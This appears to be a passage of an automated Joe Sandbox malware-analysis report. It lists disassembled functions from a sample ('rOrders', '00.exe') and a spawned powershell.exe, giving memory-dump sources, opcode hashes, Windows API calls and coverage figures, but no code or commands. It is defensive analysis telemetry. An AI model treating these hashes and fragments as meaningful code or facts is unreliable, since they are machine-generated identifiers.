Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84f7f5cbc2b0d78d8643f6c26a1313325842a666c387bb02057719ee61c3a1f6
Instruction ID: a57fe8a263eded0797b502c782346014f66df2065d59f39930c16a9954d65310
Opcode Fuzzy Hash: 84f7f5cbc2b0d78d8643f6c26a1313325842a666c387bb02057719ee61c3a1f6
Instruction Fuzzy Hash: 47C1B274E00218CFDB58DFA5D994B9DBBB2BF88304F2081A9D809AB354DB359E81CF50

Function 069C7050 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 433ef991478e5f6c4c5e954fc0fafa9dda5696476d6da23ae492a101b52ead2d
Instruction ID: 273c612faf099733a86007a347421cf7812cc466c7e2b8770445fd9ecbe3cf3f
Opcode Fuzzy Hash: 433ef991478e5f6c4c5e954fc0fafa9dda5696476d6da23ae492a101b52ead2d
Instruction Fuzzy Hash: 6DC1C374E01218CFDB58DFA5D994B9DBBB2BF88304F2081A9D809AB354DB359E81CF51

Function 069C0040 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a48eed876bac0708fd2b7ad2a8bf5450d894b68fe72afe1a6ae6b9ee6a4127b5
Instruction ID: 9752f1c3bb4101417f0a1c08eee1447066a50686d4b9f1eba28cd835052c7892
Opcode Fuzzy Hash: a48eed876bac0708fd2b7ad2a8bf5450d894b68fe72afe1a6ae6b9ee6a4127b5
Instruction Fuzzy Hash: 52C1C275E00218CFDB58DFA5D994B9DBBB2BF88304F2081A9D809AB355DB359E81CF50

Function 069C5198 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee5773402b47be0d0b2c48fb3f5a7c96c3bdefbb52446f701ede8886027ed0e3
Instruction ID: fe3de7e475182ee31f1eda978c1b50549e391f362f879cfe6a1c5aff23d44532
Opcode Fuzzy Hash: ee5773402b47be0d0b2c48fb3f5a7c96c3bdefbb52446f701ede8886027ed0e3
Instruction Fuzzy Hash: 67C1C374E01218CFDB54DFA5D994B9DBBB2BF88300F2080A9D809AB354DB35AE81CF51

Function 069C81B0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 346c6d79cf0ce4f364cbefc2b2df6dbad4edc15f307d6794a5a86f83de758587
Instruction ID: e90087a827fc1d2cb9ce8c45985167ac87416d1d0e693e7d2ca512a45bc2a9b4
Opcode Fuzzy Hash: 346c6d79cf0ce4f364cbefc2b2df6dbad4edc15f307d6794a5a86f83de758587
Instruction Fuzzy Hash: 39C1B374E01218CFDB54DFA5D994BADBBB2BF88304F2081A9D809AB354DB359E85CF50

Function 069C7900 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3972e938734a6455f64ebd9e922e99345e06fc2433fda60f5a7b668b44471e3
Instruction ID: eff9ae2f3be7da1ac9171addd499e28a8a91dce557aac4580a9d8d4731c76b4d
Opcode Fuzzy Hash: d3972e938734a6455f64ebd9e922e99345e06fc2433fda60f5a7b668b44471e3
Instruction Fuzzy Hash: 92C1C274E00219CFDB58DFA5D994B9DBBB2BF88300F2080A9D809AB354DB359E81CF50

Function 069C7D58 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99594876394d7bc0b7408a9bcc75977b68718254b62c91e62f6e4271ec4e4094
Instruction ID: e0bafd118832116514c88b677d018d19ea81626b333d3ac0edf464e17a4d539b
Opcode Fuzzy Hash: 99594876394d7bc0b7408a9bcc75977b68718254b62c91e62f6e4271ec4e4094
Instruction Fuzzy Hash: 95C1B275E00218CFDB58DFA5D994B9DBBB2BF89304F2080A9D819AB354DB359E81CF50

Function 02B5EB5B Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0e33077b4ca50285062356dd1634a507d36e0f722807e546f27a80c3eaff142
Instruction ID: 1a248be985c3202a922ed2e6576e4b4d9c5a0e6a13ce3b9c34f8f04a20ab671e
Opcode Fuzzy Hash: b0e33077b4ca50285062356dd1634a507d36e0f722807e546f27a80c3eaff142
Instruction Fuzzy Hash: 38A1AD74E01228DFDB64DF64C994B9ABBB2BF49301F1085EAD809AB350DB319E81CF51

Function 02B5ED3C Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1600cbf13a358a3c21556838623442469a767b76cd5e6e20a705b24870262b02
Instruction ID: f99ae0f8f8de01aadd3adc3718b8eb4c8df281e343ebea00a68c155b06df3015
Opcode Fuzzy Hash: 1600cbf13a358a3c21556838623442469a767b76cd5e6e20a705b24870262b02
Instruction Fuzzy Hash: C7519374A01228DFDB68DF64D854B99B7B2FF4A301F5089E9D80AA7350CB319E81CF50

Function 069C36CE Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5344984c124a4d4d2cb37f46e27183e8a2c40b9d5aa034274f026b97264f74f4
Instruction ID: a392accab6b20a117065b44575c40abcfea3ce269d9c38c77cbad8982d487a49
Opcode Fuzzy Hash: 5344984c124a4d4d2cb37f46e27183e8a2c40b9d5aa034274f026b97264f74f4
Instruction Fuzzy Hash: 9ED06774D0426C9ACB10DF5898413AEB772EB86310F0025E68509BB640D7305E508E16

Function 02B56088 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;sq, xrefs: 02B560BA
\;sq, xrefs: 02B56094
\;sq, xrefs: 02B560C6
\;sq, xrefs: 02B5609E

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID: \;sq$\;sq$\;sq$\;sq
API String ID: 0-2251010532
Opcode ID: 207a518955a1f616f0a7fc512f3f537f85a5dfc1de14211f9082c10baff82926
Instruction ID: e9f173e738d222e8d3699e8c50f6889f798d3e45457347eb6617f6ae363d291b
Opcode Fuzzy Hash: 207a518955a1f616f0a7fc512f3f537f85a5dfc1de14211f9082c10baff82926
Instruction Fuzzy Hash: E7015A717140748FDB248A2DC484B26B7AAEFC86647A941AAE901CF2A1DF62DC41C790

Analysis Process: 00.exePID: 6444, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	81
Total number of Limit Nodes:	6

Executed Functions

Function 030FD3C9 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 030FD456
GetCurrentThread.KERNEL32 ref: 030FD493
GetCurrentProcess.KERNEL32 ref: 030FD4D0
GetCurrentThreadId.KERNEL32 ref: 030FD529

Memory Dump Source

Source File: 00000006.00000002.4535693107.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30f0000_00.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 79a60bd8cc6ff033006b052692dbdc21df6a25cccb77a581b3adfcbd79ec3df6
Instruction ID: 4e60c8ab2de8a8c2e80ee82ee54c5c834e385b7ef3329a77fcb9554b5163d1da
Opcode Fuzzy Hash: 79a60bd8cc6ff033006b052692dbdc21df6a25cccb77a581b3adfcbd79ec3df6
Instruction Fuzzy Hash: 145187B09012498FDB54CFAAD948B9EFFF1EF88314F24C45AE109A7650DB34A944CB66

Function 030FD3D8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 030FD456
GetCurrentThread.KERNEL32 ref: 030FD493
GetCurrentProcess.KERNEL32 ref: 030FD4D0
GetCurrentThreadId.KERNEL32 ref: 030FD529

Memory Dump Source

Source File: 00000006.00000002.4535693107.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30f0000_00.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: a999fb8974b4849877ab3aaa231d1900314d9baff76cdd23219dac1ab5f6badf
Instruction ID: 7964ea3b99149581b5884beedbf223eb54b8351be653e0a51f6fed9b70b02100
Opcode Fuzzy Hash: a999fb8974b4849877ab3aaa231d1900314d9baff76cdd23219dac1ab5f6badf
Instruction Fuzzy Hash: 4B5165B09016098FDB54CFAAD948B9EFFF1FF88314F24C459E109A7650DB34A944CB66

Function 030FAD48 Relevance: 1.7, APIs: 1, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 030FAF9E

Memory Dump Source

Source File: 00000006.00000002.4535693107.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30f0000_00.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d28fc401a2bc4a07a3ba97705bdfbeb47a467ec9f6b3a643cb5b166389aa2bca
Instruction ID: c4784492ff3344f8105a5ccf86cf2308fec9a97560f32ff51f927c4ab8dbbc04
Opcode Fuzzy Hash: d28fc401a2bc4a07a3ba97705bdfbeb47a467ec9f6b3a643cb5b166389aa2bca
Instruction Fuzzy Hash: 558143B0A01B058FDB64DF69D44479ABBF5FF88304F04892DD68A9BA40D734E849CF91

Function 030F590D Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 030F59C9

Memory Dump Source

Source File: 00000006.00000002.4535693107.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30f0000_00.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 337d1e462933ec4d7464330a4cbc57355412beabfa1d752089c6ba5a95413781
Instruction ID: 60e6e17cd9d619cf9a91edff2d60d721879e5a60a6e242cc1e9169b218d0f209
Opcode Fuzzy Hash: 337d1e462933ec4d7464330a4cbc57355412beabfa1d752089c6ba5a95413781
Instruction Fuzzy Hash: 6B4122B0C00619CEDF24CFA9C884B9DBBF6FF89304F24816AD518AB251DB756945CF90

Function 030F4248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 030F59C9

Memory Dump Source

Source File: 00000006.00000002.4535693107.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30f0000_00.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8d76bbeb80b0f8c2a79d0014a3d7d5baf9cf92950419f68c7d62948eddea1083
Instruction ID: c612692c2224f9c3eaddb8c2dcb979dfdf197a04d44fe7335ecc3a6562ef21ec
Opcode Fuzzy Hash: 8d76bbeb80b0f8c2a79d0014a3d7d5baf9cf92950419f68c7d62948eddea1083
Instruction Fuzzy Hash: F841DDB1C00619CFDB24CFA9C884B8EBBF6FF89304F64816AD518AB251DB756945CF90

Function 030FD619 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 030FD6A7

Memory Dump Source

Source File: 00000006.00000002.4535693107.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30f0000_00.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b30c32d5aaa6d646908fb3bfc5646512675016ca251e4f521d661cd7158be364
Instruction ID: a65dc0f60ba370aaf143171a3997e56a3371903c667cad997be8fb8125d70c65
Opcode Fuzzy Hash: b30c32d5aaa6d646908fb3bfc5646512675016ca251e4f521d661cd7158be364
Instruction Fuzzy Hash: E021E6B5D012099FDB10CF9AD984ADEFBF5FB48314F14801AE918A7310D378A944CF65

Function 030FD620 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 030FD6A7

Memory Dump Source

Source File: 00000006.00000002.4535693107.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30f0000_00.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d589272bb4f5ceceb23ea9d83714db3717fc4388f2d37a18c198cacba06f6f55
Instruction ID: 0c773731fc89b8836814fea4da279ba1b6d7cbd25d708ead9382b91d2c0e2b9e
Opcode Fuzzy Hash: d589272bb4f5ceceb23ea9d83714db3717fc4388f2d37a18c198cacba06f6f55
Instruction Fuzzy Hash: 8C21C4B59012499FDB10CF9AD984ADEFBF9EB48320F14841AE918A7350D378A944CF65

Function 030FAF38 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 030FAF9E

Memory Dump Source

Source File: 00000006.00000002.4535693107.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30f0000_00.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 554973681a35d5a7ef9de2371211b3a144a1cd145467c48d6b27c08f36e3457e
Instruction ID: 99f98c0800fb259923aec744f08c959504a75fa0360b510acef58188e0b6948d
Opcode Fuzzy Hash: 554973681a35d5a7ef9de2371211b3a144a1cd145467c48d6b27c08f36e3457e
Instruction Fuzzy Hash: CD11E0B6D012498FCB10CF9AD944ADEFBF4EF88324F14841AD929A7610C379A549CFA1

Function 019FD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4534547836.00000000019FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 019FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_19fd000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 021a090534e236ab1210df4ba1020c80195785c6fe94c16c0672e08736f723cc
Instruction ID: 2c1f3e0445bff75c2333bf0b04b5e68a20da5931a7931d2abd5fd20a2448a59b
Opcode Fuzzy Hash: 021a090534e236ab1210df4ba1020c80195785c6fe94c16c0672e08736f723cc
Instruction Fuzzy Hash: 8C2106B1504240EFDB15DF58D9C4F26BFA5FB84318F24C56DEA090B25AC336D456CBA1

Function 01A0D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4534799474.0000000001A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1a0d000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 684563b679053774543c179529bb6ecdfc202151081147de8c945d96fc6cf36c
Instruction ID: e38817f5909d458d25a65606114fef4eb4ccce096dc16cfdc72ced99319608c3
Opcode Fuzzy Hash: 684563b679053774543c179529bb6ecdfc202151081147de8c945d96fc6cf36c
Instruction Fuzzy Hash: D52125B2604200EFDB16DF98E9C0B26BF65FB84364F24C56DD90E4B286C336D407CA61

Function 01A0D2BC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4534799474.0000000001A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1a0d000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc3733ffb1cfdea58eb6f4a918726a84a02248207bae0f3fbdb4882791f553f9
Instruction ID: dd475bd102833f308ed8d0f0c7cf3fdd223ad41bf9a4709687f23e61f901da48
Opcode Fuzzy Hash: cc3733ffb1cfdea58eb6f4a918726a84a02248207bae0f3fbdb4882791f553f9
Instruction Fuzzy Hash: 84215BB6504304DFDB06DF98E5C0B2ABF75FB88324F24C56DD8494B282C33AD446CAA2

Function 01A0D006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4534799474.0000000001A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1a0d000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d0e131cb967ffbc555f1bdc11ff171a59018d192c72dd7fcbce19ae597009c7
Instruction ID: 181785ed392cfa23ee94e2c10c6d2a7455d50a49d1b607cde8634bf1148c2d45
Opcode Fuzzy Hash: 8d0e131cb967ffbc555f1bdc11ff171a59018d192c72dd7fcbce19ae597009c7
Instruction Fuzzy Hash: 7121A1765093808FDB13CF64D990B15BF71EB46324F28C5DAD8498B6A7C33AD44ACB62

Function 019FD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4534547836.00000000019FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 019FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_19fd000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction ID: 6395e2678f5a732b8fea3b6b6e578444ca76d1846fd3fe2c4486c24e8e877a81
Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction Fuzzy Hash: A711E172404280DFDB12CF54D5C4B16BFB2FB84328F24C6ADD9090B65AC33AD45ACBA2

Function 01A0D2B7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4534799474.0000000001A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1a0d000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6571a979d86382cef3f3a0ee6dcd591210bcaba3c37dfea3d6794a8d99f67603
Instruction ID: 67f44b71b984d5840bdf34fbdd3e70db69b1b3d9032dcf71c4a6dc404dc8534a
Opcode Fuzzy Hash: 6571a979d86382cef3f3a0ee6dcd591210bcaba3c37dfea3d6794a8d99f67603
Instruction Fuzzy Hash: 9411C476504680CFDB12CF54E5C4B19FF71FB84324F24C6AAD8494B696C33AD44ACB92

Analysis Process: powershell.exePID: 2608, Parent PID: 6444COMMON

Executed Functions

Function 07B31810 Relevance: 5.6, Strings: 4, Instructions: 584COMMON

Download Yara Rule

Strings

4'sq, xrefs: 07B31CB2
4'sq, xrefs: 07B31B58
4'sq, xrefs: 07B31CA8
4'sq, xrefs: 07B31B4E

Memory Dump Source

Source File: 00000007.00000002.2228641003.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID: 4'sq$4'sq$4'sq$4'sq
API String ID: 0-1617174353
Opcode ID: 99af675aac99e9000d41e224fb807a3c9604943ccc3327cd1a62644ea71ef8f3
Instruction ID: e6a9a3d4e769a16f45fafb243feca22d008cbe4711733d17c03a19ae5ffaa1d6
Opcode Fuzzy Hash: 99af675aac99e9000d41e224fb807a3c9604943ccc3327cd1a62644ea71ef8f3
Instruction Fuzzy Hash: CD1238F1B0421D9FEB259B7C881176ABFAADFC2215F1480EAD515DB681DE32C8C1C7A1

Function 04D76BA8 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2218724240.0000000004D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4d70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66e4c74921521874d902a8874251def1289de1ccfbdaef809630274f1c317a4f
Instruction ID: 02fed07111eb1612280df4f945c10112c8340a782b4f888a71f57ca31b69ade7
Opcode Fuzzy Hash: 66e4c74921521874d902a8874251def1289de1ccfbdaef809630274f1c317a4f
Instruction Fuzzy Hash: 73917135A04248DFCB05CFA9D4809AEBFF2EF89314F1480AAE444AB361E735ED45DB60

Function 04D729F0 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2218724240.0000000004D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4d70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0073f9df345b2018644d608af368d47ac54661d7411b36443c66d577252fd748
Instruction ID: 1705b74e2109c0c2c8af6f0c89f530c85f2a61534b55d1656e455c5497d0d4f1
Opcode Fuzzy Hash: 0073f9df345b2018644d608af368d47ac54661d7411b36443c66d577252fd748
Instruction Fuzzy Hash: E9917C74A002458FCB15CF99C4949AEFBF2FF88310B248699D915AB3A5D735FC91CBA0

Function 07B317F5 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2228641003.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb397007a784db36c936cfa758e7d5ad4eb70d0632656ed5211a58c0ae72d5f9
Instruction ID: 8f93bfc6bf2f0c46dd96aca6b82c76e93f753a962a68ca0b2d8adebe7ae336d3
Opcode Fuzzy Hash: eb397007a784db36c936cfa758e7d5ad4eb70d0632656ed5211a58c0ae72d5f9
Instruction Fuzzy Hash: 6D4129F2A0060ECFEB208F2C8805769BFAAEF86354F1441E6D4049F252D731D885C7A2

Function 04D72B00 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2218724240.0000000004D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4d70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 399046188d32f2077f80ca5eb18e365a0d493ef7b421bd97b3a0c0469062a9b8
Instruction ID: 18d33766555c2f5069d9cefb6ff7f88b72d5029aabb32adf81f373ac7d8aef9d
Opcode Fuzzy Hash: 399046188d32f2077f80ca5eb18e365a0d493ef7b421bd97b3a0c0469062a9b8
Instruction Fuzzy Hash: C9413774A006499FCB09CF59C4989AEFBB1FF48310B258699D915AB364D732FC91CFA0

Function 04D77660 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2218724240.0000000004D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4d70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05809a96fa67f3c382f1bcd6625906891d41d79c3910464fee491edeedaa992f
Instruction ID: c9940adbebd0bea16609b23444717ba712c7aa3fc6a1bfc3d0410a49569b8cdd
Opcode Fuzzy Hash: 05809a96fa67f3c382f1bcd6625906891d41d79c3910464fee491edeedaa992f
Instruction Fuzzy Hash: 9331A1B4A092969FC704DF6CC8D0AAAFBB4FF59300B04859AD4599B352D734F816CBA1

Function 04D77650 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2218724240.0000000004D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4d70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9a874bf4ca073375fcb41d83179f0fd00d737271a04e6878d0e840e4ac6b236
Instruction ID: 981d7317a0daa6c878658542c426bf6195dfa5ef1a13b3f60f673b5affb92331
Opcode Fuzzy Hash: d9a874bf4ca073375fcb41d83179f0fd00d737271a04e6878d0e840e4ac6b236
Instruction Fuzzy Hash: DB212978A00249CFCB00DF98D4909AEBBF1FF89310B15859AD949AB356D331FC41CBA1

Function 04D72C97 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2218724240.0000000004D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4d70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f9c787c1b337775bb1a4d540e775a23ea0c14ea4a622da9162c616eb41852ad
Instruction ID: 04db29f71304c3c818d6d8dd8257096cf42acf6bc1a86dd163097b93dd1f49f9
Opcode Fuzzy Hash: 7f9c787c1b337775bb1a4d540e775a23ea0c14ea4a622da9162c616eb41852ad
Instruction Fuzzy Hash: F401D236A0A3804FCB078B78D8A01D5BFB4DF5A224F0581CBC898DB193E6295C0AC721

Function 0343D006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2216492605.000000000343D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0343D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_343d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c3dd10b2dcc42b4fd5cc2c5c0153a476bc4ce4e4fdb09dc1a4e78cd34a7e911
Instruction ID: e4186fc66dc7cea34a53e045a31ddb228b15a250b8b262981a3545e9a7e2aefe
Opcode Fuzzy Hash: 1c3dd10b2dcc42b4fd5cc2c5c0153a476bc4ce4e4fdb09dc1a4e78cd34a7e911
Instruction Fuzzy Hash: 3301407240E3C05ED7138B25C994B52BFB8DF57624F1D81DBD9888F2A3C2695849C772

Function 0343D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2216492605.000000000343D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0343D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_343d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25a2dd27ec18a09bc1f6a2857b99d2e7d18e7f49a5245e0234668bb03a019f17
Instruction ID: 4e2ef3ec39b0653342a55d44f43ed9c6ec6ee9cf99edd8529cbba9e9d2f58de9
